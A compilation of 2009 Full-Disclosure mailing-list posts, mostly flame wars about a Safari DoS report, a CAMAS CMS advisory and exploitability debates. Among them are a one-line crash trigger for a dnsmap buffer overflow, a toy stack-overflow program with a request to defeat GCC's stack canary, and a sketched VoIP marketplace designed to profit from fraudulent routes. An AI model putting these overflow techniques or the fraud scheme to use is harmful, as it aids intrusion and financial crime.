Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
Did Safari have a bug or something... On Tue, Mar 3, 2009 at 6:21 PM, Valdis' Mustache security.musta...@gmail.com wrote: Mr. Snarks, If you can't tell the difference between the Zimbabwean president and what's under my esteemed owner's nose I suggest you consult RFC 2821 for guidance. I am NOT amused. Your humble servant, V knír z Valdis On Tue, Mar 3, 2009 at 6:01 PM, Jason Starks jstarks...@gmail.com wrote: Right.. On Tue, Mar 3, 2009 at 5:45 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mr. Stark, There. On Tue, Mar 3, 2009 at 5:56 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Where? - -bm On Tue, 03 Mar 2009 17:54:51 -0500 Jason Starks jstarks...@gmail.com wrote: Mr. Mustache, There is a missing s on the end of my last name. Yours truly, Jason Bench Press Starks On Tue, Mar 3, 2009 at 5:45 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mr. Stark, Adhering to the tradition of my fathers, I do not sport any facial hair and take offense to your comment, and since you're obviously lacking basic observational skills I highly doubt you're even as talented as my Cadburys, at anything. - -bm On Tue, 03 Mar 2009 11:11:35 -0500 Jason Starks jstarks...@gmail.com wrote: Mr. Mustache, it is obvious that I have more talent than a box of chocolates, and that you envy the sadistic nature of your fellow trolls on this list. Point blank. On Tue, Mar 3, 2009 at 6:18 AM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Valdis, I have been able to reproduce a similar situation using Firefox under MacOSX, using different websites and a significantly larger number of tabs. Do you think these issues might be related or are they operating system specific? What model of CPU were you testing this issue under? Thanks, - -bm On Mon, 02 Mar 2009 23:41:53 -0500 Valdis' Mustache security.musta...@gmail.com wrote: I would like to point out that I have been able to create a hung state in the Firefox browser by opening 30 simultaneous tabs pointed at http://www.welcometointernet.org/lawnmower/ and adding a 31st tab viewing http://www.hotrussianbrides.com. Also, I am not amused. Your humble servant, Ze Mustache von Kletnieks On Mon, Mar 2, 2009 at 10:29 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Nick, You and Thierry Loller are wrong. - -bm On Mon, 02 Mar 2009 21:28:17 -0500 Nick FitzGerald n...@virus- l.demon.co.uk wrote: Chris Evans to Thierry Zoller: Example If a chrome tab can be crashed arbritarely (remotely) it is a DoS attack but with ridiculy low impact to the end-user as it only crashes the tab it was subjected to, and not the whole browser or operation system. But the fact remains that this was the impact of a DoS condition, the tab crashes arbritarily. Eh? If you visit www.evil.com and your tab crashes, that's no different from www.evil.com closing its own tab with Javascript. But what if www.evil.com has run an injection attack of some kind (SQL, XSS in blog comments, etc, etc) against www.stupid.com? Visitors to stupid.com then suffer a DoS... Yes, stupid.com should run their site better, fix their myriad XSS holes, etc, etc. But this is the Internet, so this software flaw can be leveraged as security vulnerability. I'm with Thierry on this... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmso8YACgkQhNp8gzZx3sj93AP/a+oFmgLbU2Elo0livpG3c6Qvh 8 + 0 b69LocD4LJmaR3NR4H7AHZYJiqm1TegwdTvtgY4sZd0lXi5EKZYTJMl9tj2Pd53fx X F m 7eK5yf6oRGggrdOLyDjRkMV3bVnOppwXviMHdk8quxx8sDRxA99ZlKKUA40RXFa5e A h p UpXIZ1s= =zgqd -END PGP SIGNATURE- -- Become a medical transcriptionist at home, at your own pace. http://tagline.hushmail.com/fc/BLSrjkqfMmg6RbMKs4GE43pzNkcKJRWafc 7 c DXj4iASDyccuLtQA2i9f1le/ ___ Full-Disclosure - We
[Full-disclosure] Jason Starks has invited you to open a Google mail account
I've been using Gmail and thought you might like to try it out. Here's an invitation to create an account. --- Jason Starks has invited you to open a free Gmail account. To accept this invitation and register for your account, visit http://mail.google.com/mail/a-76f552dd78-20b7d044cc-fd7096e558 Once you create your account, Jason Starks will be notified with your new email address so you can stay in touch with Gmail! If you haven't already heard about Gmail, it's a new search-based webmail service that offers: - Over 2,700 megabytes (two gigabytes) of free storage - Built-in Google search that instantly finds any message you want - Automatic arrangement of messages and related replies into conversations - Powerful spam protection using innovative Google technology - No large, annoying ads--just small text ads and related pages that are relevant to the content of your messages To learn more about Gmail before registering, visit: http://mail.google.com/mail/help/benefits.html And, to see how easy it can be to switch to a new email service, check out our new switch guide: http://mail.google.com/mail/help/switch/ We're still working every day to improve Gmail, so we might ask for your comments and suggestions periodically. We hope you'll like Gmail. We do. And, it's only going to get better. Thanks, The Gmail Team (If clicking the URLs in this message does not work, copy and paste them into the address bar of your browser). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
Grow up, really. On Mon, Mar 2, 2009 at 11:41 PM, Valdis' Mustache security.musta...@gmail.com wrote: I would like to point out that I have been able to create a hung state in the Firefox browser by opening 30 simultaneous tabs pointed at http://www.welcometointernet.org/lawnmower/ and adding a 31st tab viewing http://www.hotrussianbrides.com. Also, I am not amused. Your humble servant, Ze Mustache von Kletnieks On Mon, Mar 2, 2009 at 10:29 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Nick, You and Thierry Loller are wrong. - -bm On Mon, 02 Mar 2009 21:28:17 -0500 Nick FitzGerald n...@virus- l.demon.co.uk wrote: Chris Evans to Thierry Zoller: Example If a chrome tab can be crashed arbritarely (remotely) it is a DoS attack but with ridiculy low impact to the end-user as it only crashes the tab it was subjected to, and not the whole browser or operation system. But the fact remains that this was the impact of a DoS condition, the tab crashes arbritarily. Eh? If you visit www.evil.com and your tab crashes, that's no different from www.evil.com closing its own tab with Javascript. But what if www.evil.com has run an injection attack of some kind (SQL, XSS in blog comments, etc, etc) against www.stupid.com? Visitors to stupid.com then suffer a DoS... Yes, stupid.com should run their site better, fix their myriad XSS holes, etc, etc. But this is the Internet, so this software flaw can be leveraged as security vulnerability. I'm with Thierry on this... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmso8YACgkQhNp8gzZx3sj93AP/a+oFmgLbU2Elo0livpG3c6Qvh8+0 b69LocD4LJmaR3NR4H7AHZYJiqm1TegwdTvtgY4sZd0lXi5EKZYTJMl9tj2Pd53fxXFm 7eK5yf6oRGggrdOLyDjRkMV3bVnOppwXviMHdk8quxx8sDRxA99ZlKKUA40RXFa5eAhp UpXIZ1s= =zgqd -END PGP SIGNATURE- -- Become a medical transcriptionist at home, at your own pace. http://tagline.hushmail.com/fc/BLSrjkqfMmg6RbMKs4GE43pzNkcKJRWafc7cDXj4iASDyccuLtQA2i9f1le/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cambium Group, LLC. CAMAS Advisory
I guess these days it isn't so amazing that people can type, and even hit send, rarely sharing their views face to face. Hiding in your grandmother's closet with your indestructable, glow-in-the-dark keyboard from Best Buy is sooo in. Anyways, free Kev.. speech! On Thu, Feb 26, 2009 at 5:22 PM, Smoking Gun pentesterk...@gmail.comwrote: On Wed, Feb 25, 2009 at 11:57 AM, Adriel T. Desautels ad_li...@netragard.com wrote: I'm not sure if its appropriate for this list but it is related to penetration testing and vulnerability disclosure (moderators decide). The irony of Kevin (don't make fun of my complexion) Finisterre disclosing he has a full time job outside of security followed by his foray into the realm of security with advisories is puzzling. So Kevin isn't working in the industry as he disclosed in his previous email which means he obviously isn't working for Netragard which leads me to believe that Netragard is merely a fictitious company formed on an IRC channel amongst friends. Now this is not to say there is anything wrong with this however, to trust a bunch of IRC kids on an infrastructure would amount to career suicide. For starters outside of a modded Pentium, they'd have little experience in the real world. Themes like DoDAF, DIACAP, Information Security Architecture would be beyond the scope of their understanding. Without further-ado, I'll now speculate on the intent of this current Critical advisory Netragard was gracious enough to bless the community with. - - Contact : Adriel T. Desautels Researcher : Kevin Finisterre Vendor Notified : 08/22/2007 [Proof Of Concept] - - Proof of concept code exists but is not provided as to not increase CAMAS users overall risk levels. Any website that reads Powered by the Cambium Group, LLC. is a CAMAS powered website. Snake oil at it's finest. You may recall Netragard has a pay for play scheme working where they never disclose any code. This works to anyone's advantage as a trump card when you think about it on a psychological warfare like scale. We found a tumor somewhere in your body however, we're choosing not to tell you about how we found it, nor where it is. Imagine if you will those words coming out of a doctor's mouth. You have to take into account that a doctor is a professional as should someone in this industry be - a professional. The entire absurdity of finding a tumor and not revealing that tumor is quite shady. Wouldn't you agree? You may choose to disagree but offer some supportive argument should you choose to say so. [Vendor Status and Chronology] - - 08/06/2007 07:11:57 PM EDT - Vulnerabilities Discovered 08/24/2007 09:38:41 AM EDT - Cambium Group, LLC. Notified in full detail 08/24/2007 10:54:01 AM EDT - Cambium Group, LLC. Responds to Notification 08/27/2007 10:31:30 AM EDT - Conference Call Scheduled 08/29/2007 03:00:00 PM EDT - Held Conference call - Presented Solution 08/29/2007 03:00:00 PM EDT - Communication with the Cambium Group Faded 09/26/2008 11:17:35 PM EDT - Issues remain unfixed 02/09/2009 09:00:00 PM EDT - Issues remain unfixed 02/11/2009 03:44:19 PM EST - Whistle Blower FD Posting (No affiliation to Netragard) 02/11/2009 04:55:20 PM EST - Netragard Prepares Advisory for Release During the initial discovery by the self-impose-experts at Netragard, it seems that Cambium performed some form of diligence in the sense they took the time to listen to Netragard however, much can be gleaned from Netragards own choice of wording: 08/29/2007 03:00:00 PM EDT - Held Conference call - Presented Solution 08/29/2007 03:00:00 PM EDT - Communication with the Cambium Group Faded At the onset of a conference call - dot dot dot - there was an immediate breakdown. Not one day later, not one week later - according to Netragard it occurred the minute Netragard got on call with them. This is a rather peculiar scenario if you think about it logically. What could have been the potential breakdown; after all, Cambium took the time out of their schedules to do something. Could it have been the pitch offered by Netragard. Were you guys trying to extort them Adriel? How could that conference have played out? http://www.copyright.gov/1201/2003/comments/019.pdf It has been brought to my attention that, on July 18, 2002, a buffer overflow exploit of Tru64 UNIX was posted on securityfocus.com under the alias pha...@webtribe.net (a/k/a phased, pha...@mail.ru and James Green). Based on information provided by Gil Novak to HP concerning aliases utilized by SnoSoft, we understand that this action
Re: [Full-disclosure] Apple Safari 4 Beta feeds: URI NULL Pointer Dereference Denial of, Service Vulnerability
Better yet, name two. On Thu, Feb 26, 2009 at 9:22 PM, Jubei Trippataka vpn.1.fana...@gmail.comwrote: On Fri, Feb 27, 2009 at 12:26 PM, ne...@feelingsinister.net wrote: BM_X-Force_WP_final.pdf is called Application-Specific Attacks: Leveraging the ActionScript Virtual Machine and if you haven't read it, you should. It'll make you smile. OK, and what about this vulnerability makes use of a NULL pointer? This goes to show the shallow exploitation knowledge of this community. If you actually understood the paper it's (NULL + offset). This is NOT the same as a plain NULL deref bug. Also, you need to be able to map the NULL address, so I ask again, in examples such as this, in users-space apps name one exploitable condition. -- ciao JT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Buffer Overflow in dnsmap 0.22 - DNS Network Mapper by pagvac (gnucitizen.org)
I'm going to say dnsmap isn't suid or sguid, and a segmentation fault can occur after triggering a simple programming error (you've shown no signs of code execution). Terrrific. On Wed, Feb 25, 2009 at 10:36 AM, srl security.research.l...@gmail.comwrote: Security Advisory: PRODUCT http://www.gnucitizen.org/blog/new-version-of-dnsmap-out/ http://www.gnucitizen.org/static/blog/2009/02/dnsmap-022.tar This this is a great tool, used by the two pentesters, pagvac and pdp TECHNICAL DESCRIPTION A local buffer overflow exist in dnsmap 0.22. $ dnsmap -r `perl -e 'print Ax250'` dnsmap 0.22 - DNS Network Mapper by pagvac (gnucitizen.org) Segmentation fault SOLUTION * Wait until pagvac will learn about strncpy(). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New version of webshag is available !
Yeah, 'stick it to the dev'! I hope he has learned his lesson and that he will use more correct numbering systems instead of what ever he wants to, just because he wrote the code.. On Wed, Feb 25, 2009 at 3:24 AM, srl security.research.l...@gmail.comwrote: You should change chapter numbering from from your user manual http://www.scrt.ch/outils/webshag/ws110_manual.pdf. 0x is used for hexadecimal not for binary, so using 0x0010 for decimal 2 is incorrect. On Fri, Feb 20, 2009 at 4:56 PM, SaD webs...@scrt.ch wrote: Webshag 1.10 has been released! This new version provides several feature enhancements as well as some bug-fixes. For those who don't know it, webshag is a free, multi-threaded, multi-platform web server audit tool. Written in Python, it gathers commonly useful functionalities for web server auditing like website crawling, URL scanning and file fuzzing. As for previous version, webshag 1.10 is freely available (GPL license) for Linux and Windows platforms from http://www.scrt.ch/pages_en/outils.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Buffer Overflow in dnsmap 0.22 - DNS Network Mapper by pagvac (gnucitizen.org)
Sweet. If that is true, you should get to work on an actual exploit right away. We wouldn't want the immortal ./ segmentation fault doesn't affect your stature on this list. On Wed, Feb 25, 2009 at 11:24 AM, srl security.research.l...@gmail.comwrote: Dear Jason Starks, It can be exploited remote via XXS it the attack vectors API's and framework made by PDP, btw great work PDP and gnucitizen.org security team, keep up the good work. I now try to attach gdb to javascript to do remove exploatation of dnsmap On Wed, Feb 25, 2009 at 6:10 PM, Jason Starks jstarks...@gmail.comwrote: I'm going to say dnsmap isn't suid or sguid, and a segmentation fault can occur after triggering a simple programming error (you've shown no signs of code execution). Terrrific. On Wed, Feb 25, 2009 at 10:36 AM, srl security.research.l...@gmail.comwrote: Security Advisory: PRODUCT http://www.gnucitizen.org/blog/new-version-of-dnsmap-out/ http://www.gnucitizen.org/static/blog/2009/02/dnsmap-022.tar This this is a great tool, used by the two pentesters, pagvac and pdp TECHNICAL DESCRIPTION A local buffer overflow exist in dnsmap 0.22. $ dnsmap -r `perl -e 'print Ax250'` dnsmap 0.22 - DNS Network Mapper by pagvac (gnucitizen.org) Segmentation fault SOLUTION * Wait until pagvac will learn about strncpy(). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [NETRAGARD SECURITY ADVISORY] [Cambium Group, LLC. CAMAS Content Management System -- Multiple Critical Vulnerabilities][NETRAGARD-20070820]
Everybody love everybody? On Tue, Feb 24, 2009 at 4:49 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear SNOSOFT, Thanks to you for proving every insult made to your company as truths. Demonstrating monstrous volume of elementary computer hacking features in some unnamed and unknown web based interface does separate you from the Valdis's of the community, but not by much. You sirs should return to crying about children hijacking your xbox live accounts after defeating you in video games, and leave the more advanced computer security web hacking to Stefan Esser and his technical James Bond xbox hacking team. Also please learn to better format your pasted advisories to this list. thanks and all the best to you, - -bm On Tue, 24 Feb 2009 16:00:00 -0500 Netragard Advisories advisor...@netragard.com wrote: * Netragard, L.L.C Advisory*** The Specialist in Anti-Hacking. [Posting Notice] --- -- If you intend to post this advisory on your web page please create a clickable link back to the original Netragard advisory as the contents of the advisory may be updated. The advisory can be found on the Netragard website at http://www.netragard.com/ For more information about Netragard visit http://www.netragard.com [Advisory Information] --- -- Contact: Adriel T. Desautels Researcher : Kevin Finisterre Advisory ID: NETRAGARD-20070820 Product Name : CAMAS (Content Management System) Product Version: Unknown Vendor Name: Cambium Group, LLC. Type of Vulnerability : Multiple Critical Vulnerabilities Impact : Critical Vendor Notified: 08/22/2007 [Product Description] --- -- Cambium Group's content management system (CAMAS) give you independence from outdated content and expensive web masters. Let the user-friendly interface of CAMAS save you time and money with the freedom to manage your entire web channel yourself. Taken From: http://www.cambiumgroup.com/interior.php/pid/3/sid/3 [Technical Summary] --- -- The Cambium Group Content Management System (CAMAS) Failed most Open Web Application Security Project (OWASP) criterion during testing. Specific areas of vulnerability that were identified are as follows: Note: A reference to each is provided at the following URL: -- https://www.owasp.org/index.php/Category:Vulnerability -- [+] Authentication Testing (FAIL) --- -- CAMAS does not transport all authentication credentials over a secure encrypted channel. It is possible to capture users credentials in transit. [+] Code Quality Testing (FAIL) --- -- CAMAS does not follow industry best practices as defined by OWASP. Specifically, CAMAS is missing critical security functionality that leaves CAMAS powered websites open to attack by internet based hackers. [+] Error Handling Testing (FAIL) --- -- CAMAS is missing proper error handling and event logging capabilities as defined by OWASP. This lack of proper error handling and logging results in information leakage that can be used by an attacker to further compromise a CAMAS powered website. [+] Input Validation Testing (FAIL) --- -- CAMAS does not perform proper Input Validation. In some areas CAMAS does not perform any input validation. As a result it is possible to execute arbitrary database commands against databases that support CAMAS powered websites. It is also possible to take control of CAMAS powered websites, databases and web-servers. CAMAS does not use Parameterized Stored Procedures which is the industry standard for defending against SQL Injection. [+] Logging and Auditing Testing (FAIL) --- -- CAMAS is missing Logging and Auditing functionality as defined by OWASP. [+] Password Management (FAIL) --- -- CAMAS does not perform proper password
Re: [Full-disclosure] Worthless Disclosure
Of course. You get what you pay for and is there really any real point of relevance in asking? Jason On Thu, Feb 19, 2009 at 11:03 PM, T Biehn tbi...@gmail.com wrote: While I can never hope to live up to Jim Bell's seminal work 'assassination politics' the following is a rough draft of something that follows the same vein. A theme, which many of you undoubtedly will recognize from the current TPB cout proceedings, of making money indirectly by taking advantage of safe harbor laws by creating services that are very tempting to criminal activity. Of course the most notable example would be YouTube, which nobody will deny made it's popularity off of user contributed copyrighted works, which provided the catalyst userbase that allows it to persist in such popularity today. Other video sharing sites that have cropped up more or less cater exactly to the posters of copyright content, such as the supernova offerings. This trend of 'turning around' DMCA's Safe Harbor on the legislators that drafted and passed it is a practice I lamely call 'Chaos Engineering' or engineering a service in such a way as to instigate criminal activity, protect and propagate that activity, whilst profiting from it as a service entirely legally. One could imagine, and those familiar with the VoIP criminal underground would agree, a VoIP marketplace that allowed anyone to provide a terminating route with a bid. Such a service would intelligently route to the lowest-priced available termination point. To make this service tempt the underworld you allow 'anonymous' (e-gold anonymous) signups, and payout in any of the currently popular e-monies systems, pecunix, liberty reserve, WebMoney, include bank wires, cheques etc. To further (and would perhaps be overkill here) promote to the underground you offer an affiliate program then launch your own programs (under false credentials of course) to promote the site directly to the various 'Phreaking' communities. Naturally the termination points that were attained via some amount of coercive or illicit business practice would be the lowest priced so that their routes would be selected. The service makes its profit by charging the average rate weighted by individual server availability... a price higher than the lowest priced services but still lower than the major VoIP providers. Yeah so how would you all respond to such a situation? Jump on the money train or what. Great, -Travis ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Exploiting buffer overflows via protected GCC
I came across a problem that I am sure many security researchers have seen
before:
ja...@uboo:~$ cat bof.c
#include stdio.h
#include string.h
int main()
{
char buf[512];
memset(buf, 'A', 528);
return 0;
}
ja...@uboo:~$
ja...@uboo:~$ ./bof
*** stack smashing detected ***: ./bof terminated
=== Backtrace: =
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f08548]
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x0)[0xb7f08500]
./bof[0x8048467]
[0x41414141]
=== Memory map:
08048000-08049000 r-xp 08:01 5630493/home/jason/bof
08049000-0804a000 r--p 08:01 5630493/home/jason/bof
0804a000-0804b000 rw-p 1000 08:01 5630493/home/jason/bof
09407000-09428000 rw-p 09407000 00:00 0 [heap]
b7dfe000-b7e0b000 r-xp 08:01 2696597/lib/libgcc_s.so.1
b7e0b000-b7e0c000 r--p c000 08:01 2696597/lib/libgcc_s.so.1
b7e0c000-b7e0d000 rw-p d000 08:01 2696597/lib/libgcc_s.so.1
b7e0d000-b7e0e000 rw-p b7e0d000 00:00 0
b7e0e000-b7f66000 r-xp 08:01 2713045/lib/tls/i686/cmov/
libc-2.8.90.so
b7f66000-b7f68000 r--p 00158000 08:01 2713045/lib/tls/i686/cmov/
libc-2.8.90.so
b7f68000-b7f69000 rw-p 0015a000 08:01 2713045/lib/tls/i686/cmov/
libc-2.8.90.so
b7f69000-b7f6c000 rw-p b7f69000 00:00 0
b7f83000-b7f85000 rw-p b7f83000 00:00 0
b7f85000-b7f9f000 r-xp 08:01 2696604/lib/ld-2.8.90.so
b7f9f000-b7fa r-xp b7f9f000 00:00 0 [vdso]
b7fa-b7fa1000 r--p 0001a000 08:01 2696604/lib/ld-2.8.90.so
b7fa1000-b7fa2000 rw-p 0001b000 08:01 2696604/lib/ld-2.8.90.so
bfb8c000-bfba1000 rw-p bffeb000 00:00 0 [stack]
Aborted
ja...@uboo:~$
I have googled my brains out for a solution, but all I have gathered is that
my Ubuntu's gcc is compiled with SSP and everytime I try to overwrite the
return address it also overwrites the canary's value, and triggers a stop in
the program. I've disassembled it and anybody who can help me probably
doesn't need me to explain much more, but I would like to know a way to get
this. There seems to be some people on this list who may know something on
how to exploit on *nix systems with this protection enabled.
I do not want to just disable the protection and exploit it normally, I want
to learn how to exploit it this way.
Jason
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
